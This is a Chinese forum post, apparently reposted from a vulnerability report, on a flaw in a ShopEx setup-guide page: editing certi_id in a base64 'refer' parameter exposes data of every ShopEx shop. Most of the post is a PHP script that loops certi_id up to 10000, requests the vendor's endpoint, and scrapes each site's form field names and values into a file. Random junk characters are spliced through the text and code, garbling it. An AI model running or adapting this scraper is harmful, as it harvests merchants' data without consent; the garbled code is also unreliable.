|
|
简要描述:
3 h7 S* l" w# R" T4 R2 jShopEx某接口缺陷,可遍历所有网站* h1 {6 K: E$ `% x) H/ }$ Z& Q
详细说明:
, o' I" U; |) `& J) d% M* ~问题出现在shopex 网店使用向导页面 k( q. W/ a" ?( ?
# |" y/ K% F) D2 Z6 n7 d4 ?
7 N% f7 Q+ @2 [7 g. k; }& d) i5 ` ^) F" B: o5 f: R
http://guide.ecos.shopex.cn/step ... WlkaWFuLmNvbVwvIn0=
9 N1 y3 H1 q" f4 Y9 W
8 A+ x5 v& W3 f1 s$ K6 X* i0 f. E1 D# h
: U9 o3 P: M: [$ a- n0 K1 S* ?
refer base64解密为 {"certi_id":'1051',"callback_url":"http:\/\/www.joyogame.net\/"}
4 a5 L6 w2 W: J: x( }, L4 I5 B9 O, q* z8 l; S7 C5 A
9 x+ _$ e' z+ H# b
! U! q' V8 K1 h$ i" S7 L* C我们修改certi_id 即可遍历所有使用了ShopEx程序的网站 9 o2 N2 k [; B8 c. l1 X1 {9 R' o! `
7 h% y: d( y0 [2 f' u# o
% x. ]3 T: Z/ E8 W
7 \. Y. @. n, O+ t' P<?php$ O1 l0 B, i4 K
- q0 ^! `8 P0 N) q4 i
for ($i=1; $i < 10000; $i++) { //遍历8 M+ b. [& {9 A8 H' F2 J Q
/ T' C! c X) j* H ShowshopExD($i);, \! ^) G4 p# ~# \) w
0 F. c! y0 t- u1 b) n
}
' L0 j3 h4 d4 g# B
7 k, c& A D9 y4 Y function ShowshopExD($cid) {
) R/ l) ?. \! N, x) L4 o$ m s, }" T* p% F! f2 o& q/ C! {) v
$url='http://guide.ecos.shopex.cn/step2.php';% n% F0 D- ?/ J( R5 v( a }& p
: g$ l& y( {& ~0 X. T
$refer = base64_encode('{"certi_id":'.intval($cid).',"callback_url":"http:\/\/www.a.com\/"}');7 n% ?, S& n1 q! E% a2 r, s$ D6 s
1 f+ N& O1 N& j, ]. b3 o $url = $url.'?refer='.$refer;8 m! f) O( w# y$ {
# t2 h1 U7 K$ V' P2 @1 |8 Q $ch = curl_init($url);6 D; z" O$ q9 ^; t. e0 n y7 I- b. u
' O( _( u6 K2 _2 c; n6 n* `, v5 L curl_setopt($ch, CURLOPT_RETURNTRANSFER, true) ;& v! K1 Q( O! d9 l$ k( w
# q& l+ `/ t. t- z8 |9 G( ?
curl_setopt($ch, CURLOPT_BINARYTRANSFER, true) ;
. C6 c' d$ y& k! r
! H8 o4 i$ H( H* B# Q$ P, \& g $result = curl_exec($ch);
6 ]: M6 ~- p1 ?8 W- p
% N2 i1 D" A" A+ {1 o# L $result = mb_convert_encoding($result, "gb2312", "UTF-8");
- R2 ~" ]; ~, I% [7 }: N
& ^+ r/ F( e# `+ `% U& |/ T- H if(strpos($result,$refer))
* M( W+ t9 L& w a8 }9 `$ D; _: I4 [/ {+ l
{% a# Q4 O. N: c6 u9 q
/ V0 A8 L8 W1 K; M" F# u# W7 n $fp = fopen("c:/shopEx.txt",'ab'); //保存文件: S$ `! L% X: h" e. |- X; F$ W
" {4 q; ?- x. c8 G* v9 A preg_match_all('/<input\stype="text"(.*?)\/>/',$result,$value);
( G: O; b* m) }" P) t! `/ Y2 V
foreach ($value[1] as $key) {& i* I/ y8 X6 F( { y+ a8 I4 j/ d/ w; `
) a) ^0 `8 }" o' X0 f preg_match_all('/name="(.*?)"(.*?)value="(.*?)"/',trim($key),$res);
' e* A y* l! s, q
; `3 t o7 i! U5 m echo $res[1][0].':'.$res[3][0]."\r\n";
9 R1 C' Y) Y6 u6 x" h% _* C+ |1 B
+ J8 G* V3 e# r$ l $col =$res[1][0].':'.$res[3][0]."\r\n";
t5 p4 }8 n' T3 V+ C
( f9 q3 \( F7 l. ?/ r5 p fwrite($fp, $col, strlen($col)); v3 v9 z8 G7 ?' G
' ]7 i2 b; z0 d' o( L, C
}' M2 _8 I. Z% e- ] C& u; S
% y6 z: g( w& U2 Q
echo '--------------------------------'."\r\n";
' a5 l/ a P5 p
& `" H) D4 f& Y6 F) \ ^ fclose($fp); 2 F; G2 a- e5 f7 e) P: k
( g9 \8 s% w- k
}- d/ U2 ^0 T2 j8 F, B0 |/ U
- o, A" v6 `" n6 ] flush();# @9 M9 V9 ]9 v V3 ]
z# j) K7 p! x curl_close($ch);
+ ?% b# e$ {& |$ T0 c' d& t5 x( {% {& W/ y
}, v/ m& X, ~; j
/ _' q% n1 q- m" V
?>
+ H. H8 j/ Q- y s1 c漏洞证明:0 d" G7 m$ a. i/ M0 q! O% u
http://www.myhack58.com/Article/UploadPic/2013-9/201392110502740490.jpg
8 k: G5 E. {8 n+ |$ k% B4 s R- ]refer换成其他加密方式
) T* X( G V: z( }! z: x/ o |
|
发表于 2013-9-21 15:59:47
收藏
支持
反对